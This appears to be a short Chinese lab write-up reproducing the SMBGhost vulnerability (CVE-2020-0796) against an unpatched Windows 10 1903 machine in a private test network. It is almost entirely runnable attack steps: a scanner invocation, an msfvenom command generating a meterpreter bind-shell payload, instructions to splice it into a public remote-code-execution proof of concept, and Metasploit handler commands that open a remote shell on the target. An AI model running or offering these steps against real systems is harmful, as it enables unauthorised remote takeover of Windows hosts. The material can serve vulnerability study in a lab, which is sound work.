【内网渗透】CVE-2020-0796 永恒之黑 复现
懂的人已经哭了
环境搭建
随便整个对应版本的win10镜像,防火墙全关
Windows 10 1903版本原版镜像 - 我的MSDN
kali 192.168.233.130
win10 192.168.233.156
漏洞复现
检测是否存在漏洞
https://github.com/ly4k/SMBGhost
python scanner.py 192.168.233.156
接下来开打
先用msf生成个正向连接shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python > exploit.txt
将buf全部替换为USER_PAYLOAD
将下面工具中exploit.py中的USER_PAYLOAD部分替换成exploit.txt文件中的内容
https://github.com/chompie1337/SMBGhost_RCE_PoC
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.233.156
run
python exploit.py -ip 192.168.233.156